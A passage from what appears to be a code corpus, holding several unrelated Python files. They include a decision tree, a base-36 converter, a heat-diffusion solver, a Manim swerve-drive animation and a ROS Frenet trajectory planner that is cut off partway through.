        super(MIPCLSolver, self).__init__(**kw)

    # NOTE(review): name is misspelled ("extracHistory") but may be called by
    # the framework under this exact name — do not rename without checking.
    def extracHistory(self, line : str):
        """ Extract the sequence of primal bounds
        """
        if not self.isTableLine(line):
            return
        # history reader should be in a table. check if a display char indicates a new primal bound
        if self.inTable:
            allmatches = misc.numericExpressionOrInf.findall(line)
            if len(allmatches) == 0:
                return
            # Column layout: time, nodes, leaves, sols, best solution, lower bound.
            pointInTime = allmatches[0]
            pb = allmatches[4]
            db = allmatches[5]
            # in the case of ugscip, we reacted on a disp char, so no problem at all.
            self.addHistoryData(Key.PrimalBoundHistory, pointInTime, pb)
            self.addHistoryData(Key.DualBoundHistory, pointInTime, db)

    def isTableLine(self, line):
        """Track table state; True only for data lines inside the table."""
        if self.primalboundhistory_exp.match(line):
            self.inTable = True
            return False
        elif self.inTable and self.endtable.match(line):
            self.inTable = False
            return False
        return self.inTable
|
8,188 | ff66b33a133b627ba2329434d6c1649c94b6ec78 | import numpy as np
import copy
'''
本脚本主要用来实现决策树的相关内容。
constrcut_tree:该函数是构建决策树的主要函数
其输入:数据集X:n*p n:样本数,p-1维特征,p为样本类别,
以及属性信息label:属性名称,p-1一维数组,label表示的是此时X每一列对应的属性名称
决策结构用字典来表示,例如{attribution1:{0:{attribution2:{}},1:{attribution3:{}}}
'''
def construct_tree(X,label):
    """Recursively build an ID3 decision tree.

    X: n*p dataset where the last column of each row is the class label.
    label: attribute names for the current (non-class) columns of X.
    Returns either a class value (leaf) or a nested dict of the form
    {attr_name: {attr_value: subtree_or_class, ...}}.
    NOTE(review): `del(label[bestFea])` mutates the caller's label list —
    callers should pass a copy; confirm against call sites.
    """
    classList = [sample[-1] for sample in X]
    # If every sample has the same class, return that class as a leaf.
    if classList.count(classList[0]) == len(classList):
        return classList[0]
    # If all attributes have been consumed, return the majority class.
    if len(X[0])==1:
        return return_major(classList)
    # No empty-subset case is needed here: splits are derived from attribute
    # values that actually occur in X, so every subset is non-empty (unlike
    # the textbook formulation which must handle empty partitions).
    # Choose the attribute with the highest information gain.
    bestFea = bestdived(X)
    bestFeaName = label[bestFea]
    feaValue = [x[bestFea] for x in X]
    uniqueValue = set(feaValue)
    myTree = {bestFeaName:{}}
    del(label[bestFea])
    # Recurse into the subset for each observed value of the chosen attribute.
    for i in uniqueValue:
        myTree[bestFeaName][i]=construct_tree(splitDataSet(X,bestFea,i),label)
    return myTree
#统计一组数据中,出现次数最多的时候用以下代码
def return_major(Y):
    """Return the most frequent class label in Y (first-seen wins on ties).

    Fix: the original called operator.itemgetter without importing the
    operator module, raising NameError at runtime.
    """
    label_count = {}
    for cls in Y:
        label_count[cls] = label_count.get(cls, 0) + 1
    # max over keys by count; ties resolve to the first-inserted key,
    # matching the original stable reverse sort
    return max(label_count, key=label_count.get)
def splitDataSet(X, fea, value):
    """Return the samples whose feature `fea` equals `value`, with that
    feature column removed.  The input data set is left untouched."""
    subset = []
    for sample in copy.deepcopy(X):
        if sample[fea] == value:
            del sample[fea]
            subset.append(sample)
    return subset
def bestdived(X):
    """Return the index of the feature with the largest information gain.

    Fix: `bestFea` was unbound (UnboundLocalError) when no split produced a
    strictly positive gain; it now defaults to the first feature.
    """
    baseEnt = calcEnt(X)
    bestGain = 0.0  # largest information gain seen so far
    bestFea = 0     # default so an index is always returned
    for i in range(len(X[0]) - 1):
        feaValue = [x[i] for x in X]
        weightedEnt = 0.0  # weighted entropy of the subsets induced by feature i
        for j in set(feaValue):
            subDataset = splitDataSet(X, i, j)
            prob = len(subDataset) / len(X)
            weightedEnt += prob * calcEnt(subDataset)
        infoGain = baseEnt - weightedEnt
        if infoGain > bestGain:
            bestGain = infoGain
            bestFea = i
    return bestFea
def calcEnt(X):
    """Entropy (natural log) of the class-label column of data set X."""
    counts = {}
    for sample in X:
        cls = sample[-1]
        counts[cls] = counts.get(cls, 0) + 1
    probs = np.array(list(counts.values())) / len(X)
    return np.sum(-np.log(probs) * probs)
|
8,189 | b5835b676eb8ac814086f7482f172f48e2ad5a0a | #anand python problem 2:29
#Write a function array to create an 2-dimensional array. The function should take both dimensions as arguments. Value of each element can be initialized to None:
#
def array_imp(row, col):
    """Create a row x col 2-D list initialised to None (independent rows)."""
    return [[None for _ in range(col)] for _ in range(row)]
if __name__ == '__main__':
    outs = array_imp(2, 3)
    # Fix: use the function form of print so the script also runs on
    # Python 3 (the original `print outs` statement is Python 2 only;
    # the parenthesised form behaves identically on both versions here).
    print(outs)
|
8,190 | e98767fbac44f50f58c149e16124fef95b38cf71 | """
作用域
在Python中,当引用一个变量的时候,对这个【变量的搜索】是按照
本地作用域(Local)、
嵌套作用域(Enclosing function locals)、
全局作用域(Global)、
内置作用域(builtins模块)
的顺序来进行的,
即所谓的LEGB规则。
然而当在一个【函数内部为一个变量赋值】时,并不是按照上面所说LEGB规则来首先找到变量,之后为该变量赋值。在Python中,在函数中为一个变量赋值时,有下面这样一条规则
“当在函数中给一个变量名赋值是(而不是在一个表达式中对其进行引用),Python总是🔹创建或改变本地作用域的变量名🔹,除非它已经在那个函数中被声明为全局变量. ”
"""
# Demo (L in LEGB): assignment inside a function creates a new LOCAL name,
# so the module-level x is untouched.
x = 99
def func():
    x = 88  # local x shadows the global; discarded when func returns
func()
print(x)  # -> 99
# Demo (G in LEGB): `global` rebinds the module-level name from inside a function.
y = 100
def func_y():
    global y
    y = 101
func_y()
print(y)  # -> 101
def func_z():
    # Demo (E in LEGB): without `nonlocal`, assignment in the nested
    # function creates a new local; the enclosing z stays 520.
    z = 520
    def foo():
        z = 521
    foo()
    print(z)  # -> 520
func_z()
def func_e():
    # Demo: `nonlocal` rebinds the variable of the enclosing function scope;
    # unlike `global`, the name must already exist in that scope.
    count = 0
    def foo():
        nonlocal count
        count = 12
    foo()
    print(count)  # -> 12
func_e()
"""
使用global关键字修饰的变量之前可以并不存在,而使用nonlocal关键字修饰的变量在嵌套作用域中必须已经存在
"""
|
8,191 | 5a265ecb9f1d6d0e4a5c66d241fbfe4a6df97825 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 19 09:41:08 2018
hexatrigesimal to decimal calculator,
base 36 encoding; use of letters with digits.
@author: susan
"""
## create a dictionary as reference for BASE 36 calculations
WORD = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" # digits of BASE 36
# map each digit character to its numeric value 0..35
BASE = {digit: value for value, digit in enumerate(WORD)}
# input function, BASE 36 numbers for calculations.
def enter_num():
    """Prompt for a BASE 36 number, validating every digit.

    Re-prompts on invalid input if the user agrees; returns the validated
    (upper-cased) string, or None when the user gives up.

    Fix: the original kept iterating over the digits of the *old* string
    after a re-entry, so a single bad input could trigger several redundant
    error/re-enter prompts; it also upper-cased each digit a second time
    even though the whole string was already upper-cased.
    """
    while True:
        num = input("please enter a BASE 36 number, e.g. A36Z :> ").upper()
        if all(digit in WORD for digit in num):
            return num
        print(" **error** user input failed\n")
        print("do you want to re enter number")
        ans = input("y or n ").upper()
        if ans != "Y":
            return None
# make list function.
def mk_num_lst(num):
""" make BASE 36 number from user into a list.
reverse list so digit are read left to right.
returns
-------
num_lst
"""
num_lst = []
for digit in num:
num_lst.append(digit)
num_lst.reverse()
return num_lst
# convert function.
def convert(num_lst):
""" convert each digit to power of 36 appropriately.
prints result in decimal.
returns
-------
dec
"""
dec = 0
for i in range(0, len(num_lst)):
print("position right to left is >", i+1,
"value is ", BASE[(num_lst[i])],
"decimal value is",
(36**i) * BASE[(num_lst[i])])
dec += (36**i) * BASE[(num_lst[i])]
return dec
# main program flow function.
def main():
"""
process valid user input or
terminate program on failed input.
"""
num = enter_num()
if num is not None:
num_lst = mk_num_lst(num)
dec = convert(num_lst)
print("decimal value of BASE 36 number", num, "is", dec)
else:
print("user terminated program")
# program start.
main()
|
my_order = ['spam', 'eggs', 'sausage', 'spam', 'bacon', 'spam']
# complain once per spam item, then drop them all
for _ in range(my_order.count('spam')):
    print("I don't like spam!")
my_order = [item for item in my_order if item != 'spam']
print(my_order)
|
8,193 | c556aaf6aecb3c91d9574e0a158a9fa954108d70 | import numpy as np
import matplotlib.pyplot as plt
# some important constants
x_bound = y_bound = 1.           # unit-square domain
dx = dy = 0.05                   # grid spacing
k = 0.1                          # diffusivity
nx, ny = int(x_bound/dx), int(y_bound/dy)
dx2, dy2 = dx*dx, dy*dy
dt = (dx2 / k) / 4.0             # FTCS stability limit for 2-D diffusion
t_end = 80 * dt                  # final time: 80 steps
# set the grid
u0 = np.zeros((nx, ny))          # solution at the current time level
u_exact = np.zeros((nx, ny))     # analytic solution tabulated at t_end
u = np.zeros((nx, ny))           # scratch array for the next time level
def get_exact(x, y, t, trunc):
    """Get the exact solution at a set t.

    Double Fourier-series solution of the 2-D diffusion problem, truncated
    after trunc-1 terms in each index (n, m).
    NOTE(review): the grouping of the (-2 + 2*(-1)**m) factor in Z_num is
    taken as-is from the original -- verify against the hand derivation.
    """
    Z = 0
    for n in range(1, trunc):
        for m in range(1, trunc):
            # series coefficient (numerator) for mode (n, m)
            Z_num = -120 * ( ((-n)**4 * np.pi**4 * (-1)**n) +\
                    (12 * n**2 * np.pi ** 2 * (-1)**n)\
                    + 24 + (24 * (-1)**(1+n))\
                    *(-2 + (2*(-1)**m) ) )
            # spatial mode shape decayed in time (uses global diffusivity k)
            Z_num_xy = np.sin(n*x*np.pi)*np.sin(m*y*np.pi)\
                    * np.exp(-(n**2 + m**2) * np.pi**2 * k * t)
            Z_denom = n**7 * np.pi**10 * m**3
            Z += Z_num * Z_num_xy / Z_denom
    return Z
def get_L_norm(exact, u):
    """Return (L-infinity norm of exact-u, elementwise absolute differences)."""
    diffs = abs(exact - u)
    row_maxima = [row.max() for row in diffs]
    return max(row_maxima), diffs
# Initial conditions
# u(x, y, 0) = x (1 - x^5) y (1 - y); also tabulate the analytic solution
# at t_end for the error norm computed below.
for i in range(nx):
    for j in range(ny):
        x = i*dx
        y = j*dy
        u0[i,j] = x * (1-x**5) * y * (1-y)
        u_exact[i,j] = get_exact(x, y, t_end, 10)
def do_timestep(u0, u):
    """Advance one FTCS step (forward time, centred space) on interior nodes.

    Boundary values are left untouched (Dirichlet zero from initialisation).
    Returns (new current level, scratch array).
    """
    laplacian_x = (u0[2:, 1:-1] - 2*u0[1:-1, 1:-1] + u0[:-2, 1:-1]) / dx2
    laplacian_y = (u0[1:-1, 2:] - 2*u0[1:-1, 1:-1] + u0[1:-1, :-2]) / dy2
    u[1:-1, 1:-1] = u0[1:-1, 1:-1] + k * dt * (laplacian_x + laplacian_y)
    u0 = u.copy()
    return u0, u
# March the solution forward 80 steps so the simulated time matches t_end.
# Fix: the original performed only a SINGLE step, which was inconsistent
# with t_end = 80*dt, with u_exact tabulated at t_end, and with the plot
# title "after 80 time steps".
for _ in range(80):
    u0, u = do_timestep(u0, u)
l_inf_norm, norm_diff_vals = get_L_norm(u_exact, u0)
# heat map of the final FTCS solution
fig = plt.figure(1)
ax = fig.add_subplot(111)
im = ax.imshow(u.copy(), cmap=plt.get_cmap('hot'), vmin=0, vmax=0.06)
cbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7])
ax.set_title('2D distribution after 80 time steps using FTCS')
plt.xlabel('x node [-]')
plt.ylabel('y node [-]')
fig.colorbar(im, cax=cbar_ax)
plt.savefig('./writeup/problem2_plot.png')
# heat map of the pointwise error against the series solution
fig = plt.figure(2)
ax = fig.add_subplot(111)
ax.set_title('|f_exact - f_ftcs| Using FTCS')
plt.xlabel('x node [-]')
plt.ylabel('y node [-]')
im = ax.imshow(norm_diff_vals.copy(), cmap=plt.get_cmap('hot'), vmin=0,\
        vmax=l_inf_norm)
cbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7])
fig.colorbar(im, cax=cbar_ax)
plt.savefig('./writeup/problem2_error.png')
print("The L_infinity error for FTCS is: " + str(l_inf_norm))
|
8,194 | 7a4d04bd60b5f5555982af372145f9f4bcd83ca2 | # Get Facebook's bAbi dataset
from utils import maybe_download
from shutil import rmtree
import os
import tarfile
def get_babi_en(get_10k=False):
    """Download and unpack Facebook's bAbI tasks (English split).

    get_10k: use the 10k-examples-per-task variant instead of the 1k one.
    Moves the task files into datasets/babi and removes the archive and
    the extracted directory tree.
    """
    data_dir = "datasets/tasks_1-20_v1-2/en/"
    if get_10k:
        data_dir = "datasets/tasks_1-20_v1-2/en-10k/"
    maybe_download('https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz', 'datasets', 11745123)
    # context manager guarantees the archive handle is closed even on error
    # (the original also shadowed the builtins `file` and `dir`)
    with tarfile.open("datasets/babi_tasks_1-20_v1-2.tar.gz", "r:gz") as archive:
        archive.extractall("datasets")
    print("Some housekeeping...")
    if not os.path.exists("datasets/babi"):
        os.makedirs("datasets/babi")
    # Fix: join with the directory actually being walked (`root`), not the
    # top-level data_dir, so files in any sub-directory are moved correctly.
    for root, _dirs, files in os.walk(data_dir):
        for fname in files:
            os.rename(os.path.join(root, fname), os.path.join("datasets/babi", fname))
    os.remove("datasets/babi_tasks_1-20_v1-2.tar.gz")
    rmtree("datasets/tasks_1-20_v1-2")
    print("Finished.")
# Read a permutation and print its inverse:
# position j of the output holds the 1-based index i with a[i] == j+1.
n = int(input())
a = [int(e) for e in input().split()]
ans = [0] * n
for position, value in enumerate(a, start=1):
    ans[value - 1] = position
print(*ans)
8,196 | bdde3a3725510d4a83b09421e4b8538a38e29584 | from manimlib.imports import *
import math
class A_Swerve(Scene):
    """Manim scene animating the wheel vectors of a swerve drive while two
    virtual gamepad sticks (translation and rotation) are moved around."""
    def construct(self):
        # robot chassis and the four wheel-module dots
        chassis = Square(side_length=2, stroke_width=0, fill_color=GRAY, fill_opacity=1).shift(2*RIGHT)
        fr = Dot().shift(UP+3*RIGHT)
        fl = Dot().shift(UP+RIGHT)
        rl = Dot().shift(DOWN+RIGHT)
        rr = Dot().shift(DOWN+3*RIGHT)
        # trackers simulating the gamepad axes; y starts slightly off zero
        # so the wheel arrows never have zero length
        x_tracker = ValueTracker(0)
        y_tracker = ValueTracker(0.001)
        rot_tracker = ValueTracker(0)
        # each updater recomputes its wheel's [speed, angle] from the stick
        # state and redraws the arrow anchored at that wheel position
        def updateFRArrow(arrow):
            vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[0]
            arrow.put_start_and_end_on(UP+3*RIGHT, np.array(UP+3*RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
        def updateFLArrow(arrow):
            vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[1]
            arrow.put_start_and_end_on(UP+RIGHT, np.array(UP+RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
        def updateRLArrow(arrow):
            vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[2]
            arrow.put_start_and_end_on(DOWN+RIGHT, np.array(DOWN+RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
        def updateRRArrow(arrow):
            vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[3]
            arrow.put_start_and_end_on(DOWN+3*RIGHT, np.array(DOWN+3*RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
        fr_vector = Arrow()
        fr_vector.add_updater(updateFRArrow)
        fl_vector = Arrow()
        fl_vector.add_updater(updateFLArrow)
        rl_vector = Arrow()
        rl_vector.add_updater(updateRLArrow)
        rr_vector = Arrow()
        rr_vector.add_updater(updateRRArrow)
        # on-screen gamepad: left stick = translation, right stick = rotation
        left_pad = Circle(radius=0.5).move_to(3*LEFT)
        left_stick = Circle(radius=0.25, fill_color=WHITE, fill_opacity=1).move_to(3*LEFT)
        left_stick.add_updater(lambda x: x.move_to(3*LEFT+0.4*x_tracker.get_value()*RIGHT+0.4*y_tracker.get_value()*UP))
        right_pad = Circle(radius=0.5).move_to(1*LEFT)
        right_stick = Circle(radius=0.25, fill_color=WHITE, fill_opacity=1).move_to(1*LEFT)
        right_stick.add_updater(lambda x: x.move_to(1*LEFT+0.4*rot_tracker.get_value()*RIGHT))
        self.play(FadeIn(chassis), ShowCreation(fr), ShowCreation(fl), ShowCreation(rl), ShowCreation(rr))
        self.play(ShowCreation(left_pad), ShowCreation(left_stick), ShowCreation(right_pad), ShowCreation(right_stick))
        self.play(ShowCreation(fr_vector), ShowCreation(fl_vector), ShowCreation(rl_vector), ShowCreation(rr_vector))
        self.wait(1)
        # Full forward
        self.play(ApplyMethod(y_tracker.set_value, 1, run_time=1, rate_func=smooth))
        # Semi circle
        self.play(ApplyMethod(x_tracker.set_value, -1, run_time=2, rate_func=there_and_back),
                  ApplyMethod(y_tracker.set_value, -1, run_time=2, rate_func=smooth))
        # Semi circle
        self.play(ApplyMethod(x_tracker.set_value, 1, run_time=2, rate_func=there_and_back),
                  ApplyMethod(y_tracker.set_value, 1, run_time=2, rate_func=smooth))
        # Neutral
        self.play(ApplyMethod(y_tracker.set_value, 0.001, run_time=1, rate_func=smooth))
        # Pure rotation
        self.play(ApplyMethod(rot_tracker.set_value, -1, run_time=1, rate_func=smooth))
        self.play(ApplyMethod(rot_tracker.set_value, 1, run_time=2, rate_func=smooth))
        self.play(ApplyMethod(rot_tracker.set_value, 0, run_time=1, rate_func=smooth))
        # Full forward plus rotation
        self.play(ApplyMethod(y_tracker.set_value, 1, run_time=1, rate_func=smooth))
        self.play(ApplyMethod(rot_tracker.set_value, -1, run_time=1, rate_func=smooth))
        self.play(ApplyMethod(rot_tracker.set_value, 1, run_time=2, rate_func=smooth))
        self.play(ApplyMethod(rot_tracker.set_value, 0, run_time=1, rate_func=smooth))
        # Neutral
        self.play(ApplyMethod(y_tracker.set_value, 0.001, run_time=1, rate_func=smooth))
        # Move FR: detach its updater and highlight the module in red
        self.wait(1)
        self.play(ApplyMethod(rot_tracker.set_value, -1, run_time=1, rate_func=smooth))
        fr_vector.remove_updater(updateFRArrow)
        self.play(ApplyMethod(fr.shift, 0.3*DOWN), ApplyMethod(fr_vector.shift, 0.3*DOWN))
        self.play(ApplyMethod(fr.set_color, RED), ApplyMethod(fr_vector.set_color, RED))
        self.wait(1)
        self.play(ApplyMethod(fr.set_color, WHITE), ApplyMethod(fr_vector.set_color, WHITE))
        self.play(ApplyMethod(fr.shift, 0.3*UP), ApplyMethod(fr_vector.shift, 0.3*UP))
        fr_vector.add_updater(updateFRArrow)
        # Neutral
        self.play(ApplyMethod(rot_tracker.set_value, 0, run_time=1, rate_func=smooth))
        # Fade out
        self.wait(1)
        self.play(FadeOut(fr), FadeOut(fl), FadeOut(rl), FadeOut(rr), FadeOut(chassis),
                  FadeOut(left_pad), FadeOut(left_stick), FadeOut(right_pad), FadeOut(right_stick),
                  FadeOut(fr_vector), FadeOut(fl_vector), FadeOut(rl_vector), FadeOut(rr_vector))
# chassis geometry used by the swerve inverse kinematics (same units for both)
wheelBase = 10
trackWidth = 10
def calculateVectors(FWD, STR, RCW, gyroAngle, wheel_base=None, track_width=None):
    """Swerve-drive inverse kinematics.

    FWD, STR: forward and strafe commands; RCW: clockwise rotation command;
    gyroAngle: robot heading in radians, used to make the command
    field-centric.  wheel_base/track_width default to the module-level
    chassis constants; pass them explicitly for other geometry
    (backward-compatible generalization).
    Returns a 4x2 array of [speed, angle_deg] rows in the order
    front-right, front-left, back-left, back-right; speeds are normalised
    so none exceeds 1.
    Fix: the normalisation no longer shadows the builtin `max`.
    """
    if wheel_base is None:
        wheel_base = wheelBase
    if track_width is None:
        track_width = trackWidth
    # Makes the command field-centric.
    temp = FWD * math.cos(gyroAngle) + STR * math.sin(gyroAngle)
    STR = -FWD * math.sin(gyroAngle) + STR * math.cos(gyroAngle)
    FWD = temp
    # Uses inverse kinematics to derive wheel speeds and angles.
    R = math.hypot(wheel_base, track_width)
    A = STR - RCW * (wheel_base / R)
    B = STR + RCW * (wheel_base / R)
    C = FWD - RCW * (track_width / R)
    D = FWD + RCW * (track_width / R)
    fr_ws = math.hypot(B, C)
    fl_ws = math.hypot(B, D)
    bl_ws = math.hypot(A, D)
    br_ws = math.hypot(A, C)
    fr_wa = math.atan2(B, C) * 180 / math.pi
    fl_wa = math.atan2(B, D) * 180 / math.pi
    bl_wa = math.atan2(A, D) * 180 / math.pi
    br_wa = math.atan2(A, C) * 180 / math.pi
    # Normalize wheel speeds so the fastest module is at most 1.
    top_speed = max(fr_ws, fl_ws, bl_ws, br_ws)
    if top_speed > 1:
        fr_ws /= top_speed
        fl_ws /= top_speed
        bl_ws /= top_speed
        br_ws /= top_speed
    return np.array([[fr_ws, fr_wa],
                     [fl_ws, fl_wa],
                     [bl_ws, bl_wa],
                     [br_ws, br_wa]])
|
8,197 | 4647a7d0996ceeef4f39cf3182ac3944d25cb349 | #!/usr/bin/python2
# -*- coding: UTF-8 -*-
# coding: utf-8
#!/usr/bin/env python
'''
发布轨迹信息
path.x; path.y; c_speed;
'''
import numpy as np
import matplotlib.pyplot as plt
import copy
import math
from cubic_spline import Spline2D
from polynomials import QuarticPolynomial, QuinticPolynomial
import time
import rospy
from std_msgs.msg import String
from std_msgs.msg import Float32
from std_msgs.msg import Int32
from geometry_msgs.msg import Point
from nav_msgs.msg import Path
from local_planner.msg import localPath
from geometry_msgs.msg import PoseStamped, Quaternion
import tf
from CAN_driver.msg import Motor_Feedback
from GNSS_driver.msg import GNSS_CAN
import sys
# Planner parameters
MAX_SPEED = 30.0  # maximum speed [m/s]
MAX_ACCEL = 50.0  # maximum acceleration [m/s^2]
MAX_CURVATURE = 30.0  # maximum curvature [1/m]
MAX_ROAD_WIDTH = 10.0  # maximum road width [m]
D_ROAD_W = 2.0  # road-width sampling interval [m]
DT = 0.3  # Delta T [s]
MAXT = 6.0  # maximum prediction horizon [s]
MINT = 4.0  # minimum prediction horizon [s]
TARGET_SPEED = 15.0/3.6  # target speed to keep longitudinally [m/s]
D_T_S = 10.0/3.6  # target-speed sampling interval [m/s]
N_S_SAMPLE = 0.1  # number of target-speed samples
ROBOT_RADIUS = 2.3  # vehicle radius [m]
THRESH_DIST=0.01  # snap-to-path threshold [m]
# cost function weights
KJ = 0.8   # jerk
KT = 0.1   # horizon length
KD = 20.0  # terminal offset / speed error
KLAT = 0.8  # lateral cost weight
KLON = 0.2  # longitudinal cost weight
show_animation = True
# global obstacle coordinate buffers, filled by the ROS obstacle callback
Gob_x = []
Gob_y = []
# planning-failure flag (1 on failure; consumed by the decision layer)
PathFail_flag = 0
class FrenetPath:
    """One candidate trajectory in Frenet coordinates plus its global form."""
    def __init__(self):
        self.t = []       # time stamps
        self.d = []       # lateral offset and its 1st/2nd/3rd derivatives
        self.d_d = []
        self.d_dd = []
        self.d_ddd = []
        self.s = []       # longitudinal position and its derivatives
        self.s_d = []
        self.s_dd = []
        self.s_ddd = []
        self.cd = 0.0     # lateral cost
        self.cv = 0.0     # longitudinal cost
        self.cf = 0.0     # total (weighted) cost
        self.x = []       # global x, y, heading, segment length, curvature
        self.y = []
        self.yaw = []
        self.ds = []
        self.c = []
def calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):
    """Sample lateral offsets, horizons and target speeds; return all
    candidate FrenetPath objects.

    c_speed: current speed; c_d, c_d_d, c_d_dd: current lateral offset and
    its derivatives; s0: current longitudinal position along the spline.
    """
    frenet_paths = []
    # generate path to each offset goal
    for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):
        # Lateral motion planning: one quintic per (offset, horizon) pair
        for Ti in np.arange(MINT, MAXT, DT):
            fp = FrenetPath()
            # quintic polynomial towards the target configuration (di, Ti)
            lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)
            fp.t = [t for t in np.arange(0.0, Ti, DT)]
            fp.d = [lat_qp.calc_point(t) for t in fp.t]
            fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]
            fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]
            fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]
            # Longitudinal motion planning (velocity keeping)
            for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):
                tfp = copy.deepcopy(fp)
                lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)
                tfp.s = [lon_qp.calc_point(t) for t in fp.t]
                tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]
                tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]
                tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]
                ###########################################################
                # high-speed cost terms
                ###########################################################
                Jp = sum(np.power(tfp.d_ddd, 2))  # square of jerk
                Js = sum(np.power(tfp.s_ddd, 2))  # square of jerk
                # square of diff from target speed
                ds = (TARGET_SPEED - tfp.s_d[-1])**2
                # lateral cost
                tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1]**2
                # longitudinal cost
                tfp.cv = KJ * Js + KT * Ti + KD * ds
                # total cost: weighted sum of lateral and longitudinal costs
                #########################################################
                # low-speed cost variant (kept for reference, disabled)
                #########################################################
                # ltfp = copy.deepcopy(tfp)
                # ltfp.d_sss = [lat_qp.calc_third_derivative(s) for s in tfp.s]
                # Jp_s = sum(np.power(ltfp.d_sss, 2))  # square of jerk
                # Js = sum(np.power(tfp.s_ddd, 2))  # square of jerk
                # dS = tfp.s[-1] - s0
                # tfp.cd = KJ * Jp_s + KT * dS + KD * tfp.d[-1] ** 2
                # tfp.cv = KJ * Js + KT * Ti + KD * ds
                tfp.cf = KLAT * tfp.cd + KLON * tfp.cv
                frenet_paths.append(tfp)
    return frenet_paths
def calc_global_paths(fplist, csp):
    """Convert each Frenet path to global x/y and derive yaw, ds and curvature."""
    for fp in fplist:
        # calc global positions
        for i in range(len(fp.s)):
            ix, iy = csp.calc_position(fp.s[i])
            if ix is None:
                # past the end of the reference spline: stop converting this path
                break
            iyaw = csp.calc_yaw(fp.s[i])
            di = fp.d[i]
            # offset the spline point by the lateral distance along the normal
            fx = ix + di * math.cos(iyaw + math.pi / 2.0)
            fy = iy + di * math.sin(iyaw + math.pi / 2.0)
            fp.x.append(fx)
            fp.y.append(fy)
        # calc yaw and ds from consecutive global points
        for i in range(len(fp.x) - 1):
            dx = fp.x[i + 1] - fp.x[i]
            dy = fp.y[i + 1] - fp.y[i]
            fp.yaw.append(math.atan2(dy, dx))
            fp.ds.append(math.sqrt(dx**2 + dy**2))
        # duplicate the last value so lengths match the point count
        fp.yaw.append(fp.yaw[-1])
        fp.ds.append(fp.ds[-1])
        # calc curvature as the heading change rate per unit arc length
        for i in range(len(fp.yaw) - 1):
            fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])
    return fplist
def check_collision(fp, ob):
    """Return False if any trajectory point comes within ROBOT_RADIUS of an
    obstacle in `ob` (an Nx2 array of x/y), True otherwise."""
    for ox, oy in ob:
        for px, py in zip(fp.x, fp.y):
            if (px - ox)**2 + (py - oy)**2 <= ROBOT_RADIUS**2:
                return False
    return True
def check_paths(fplist, ob):
    """
    check path above max speed, max a, does collision or not
    """
    feasible = []
    for fp in fplist:
        if any(v > MAX_SPEED for v in fp.s_d):           # speed limit
            continue
        if any(abs(a) > MAX_ACCEL for a in fp.s_dd):     # acceleration limit
            continue
        if any(abs(c) > MAX_CURVATURE for c in fp.c):    # curvature limit
            continue
        if not check_collision(fp, ob):                  # obstacle clearance
            continue
        feasible.append(fp)
    return feasible
def frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):
    """Generate, globalise and filter candidate paths; return the cheapest
    feasible one (None when no candidate survives the checks)."""
    ob = np.array(ob)
    candidates = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)
    candidates = calc_global_paths(candidates, csp)
    candidates = check_paths(candidates, ob)
    # pick the minimum-cost path (later candidates win ties, as before)
    best = None
    lowest = float("inf")
    for cand in candidates:
        if cand.cf <= lowest:
            lowest = cand.cf
            best = cand
    return best
def generate_road_widle(x,y):
    """Sample the left and right road borders at +/- MAX_ROAD_WIDTH/2 offsets
    along the normal of a spline fitted through the waypoints (x, y)."""
    csp = Spline2D(x, y)
    s = np.arange(0, csp.s[-1], 0.1)
    road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []
    for i_s in s:
        ix, iy = csp.calc_position(i_s)
        # offset the centreline point along the spline normal, each side
        road_left_ix = ix + MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
        road_left_iy = iy + MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
        road_right_ix = ix - MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
        road_right_iy = iy - MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
        road_left_x.append(road_left_ix)
        road_left_y.append(road_left_iy)
        road_right_x.append(road_right_ix)
        road_right_y.append(road_right_iy)
    return road_left_x, road_left_y, road_right_x, road_right_y
def generate_target_course(x, y):
    """Fit a 2-D cubic spline through the waypoints and sample position,
    yaw and curvature every 0.1 m of arc length."""
    csp = Spline2D(x, y)
    arc_samples = np.arange(0, csp.s[-1], 0.1)
    rx, ry, ryaw, rk = [], [], [], []
    for s_i in arc_samples:
        px, py = csp.calc_position(s_i)
        rx.append(px)
